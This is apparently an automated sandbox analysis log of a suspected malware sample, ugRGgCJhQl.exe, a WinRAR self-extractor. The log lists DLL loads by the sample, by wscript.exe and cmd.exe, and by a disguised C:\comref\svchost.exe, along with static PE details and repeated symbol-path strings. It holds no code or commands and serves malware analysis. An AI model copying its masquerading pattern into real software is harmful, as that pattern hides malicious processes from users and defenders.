Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: amsi.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: rasman.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: winmm.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: mmdevapi.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: devobj.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: ksuser.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: avrt.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: audioses.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: midimap.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: edputil.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\comref\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\comref\svchost.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: ugRGgCJhQl.exe Static file information: File size 2295916 > 1048576
Source: ugRGgCJhQl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ugRGgCJhQl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ugRGgCJhQl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ugRGgCJhQl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ugRGgCJhQl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ugRGgCJhQl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: ugRGgCJhQl.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: ugRGgCJhQl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: }C:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: iC:/Users/user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004CB9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006A94000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000044FA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000539C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006628000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005E7E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: rC:/Users/user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004877000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006455000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005E7E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006876000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: pC:/Users/user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004877000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006A94000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: qC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004CB9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000052B6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005E7E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000052B6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000044FA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000539C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006A94000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006628000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004A9C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004A9C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ugRGgCJhQl.exe
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006876000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: zC:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000052B6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: {C:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: kC:/Users/user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004CB9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006455000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004A9C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006455000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: lC:/Users/user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004877000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005E7E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: |C:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000052B6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006876000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000044FA000.00000004.00000800.00020000.00000000.sdmp
